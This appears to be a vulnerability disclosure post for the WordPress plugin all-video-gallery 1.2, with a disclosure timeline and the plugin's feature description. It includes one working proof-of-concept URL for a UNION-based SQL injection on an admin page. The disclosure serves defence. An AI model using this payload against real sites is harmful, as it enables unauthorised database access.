wp-plugin : all-video-gallery – A1-Injection

 

Plugin Details

 

Plugin Name : all-video-gallery

 

Effected Version : 1.2 (and most probably lower version's if any)

 
Vulnerability : A1-Injection
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Administrator

 

PoC - (Proof of Concept) :

 

http://localhost/wp-admin/admin.php?page=allvideogallery_videos&opt=edit&id=2 union select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

 

Although Version 1.2 was released to fix simmilar issues however this perticular instance was not fixed considering to the fact that this interface is only accessible to administrator.

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-25

 
Plugin Status : No Change
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Video Player Demo : http://allvideogallery.mrvinoth.com/livedemo/?slg=300-warriors

We are proud to announce the first Video share solution for WordPress. Using All Video Gallery, you can build websites like Youtube, Vimeo and Dailymotion in less than an hour. This Extension contain several features like adding Videos to your Post, building Video Galleries and showing Featured, Popular, Latest & Random videos. More than all, this extension has HTML5 fallback for Mobile devices. So, your videos can also be viewed in mobile devices with some limitations.

Features include:

* Supported Media formats : flv, mp4, 3g2, 3gp, aac, f4b, f4p, f4v, m4a, m4v, mov(h.264), sdp, vp6.
* HTML5 fallback.
* Simplified Shortcode to add Players and Thumbnail galleries either to your Posts [or] Pages.
* Thumbnail Galleries can be built based on Categories or Latest, Featured, Popular and Random Videos.
* Widget option to add Thumbnail galleries to your website's sidebar.
* Coloring the player skin.
* Adding or Removing skin elements.
* Facebook and Twitter Share.
* Related Videos inside the Player.
* Branding of the Player.
* Option to add Videos by simply providing the Video URL.
* Youtube API to play Youtube videos.
* True Streaming methods like RTMP and Lighttpd.
* CDN streaming like Amazon Cloudfront, Highwinds SMIL and Bitgravity Streaming.
* Option to add Third party Embedcodes.

Leave a Reply

Your email address will not be published. Required fields are marked *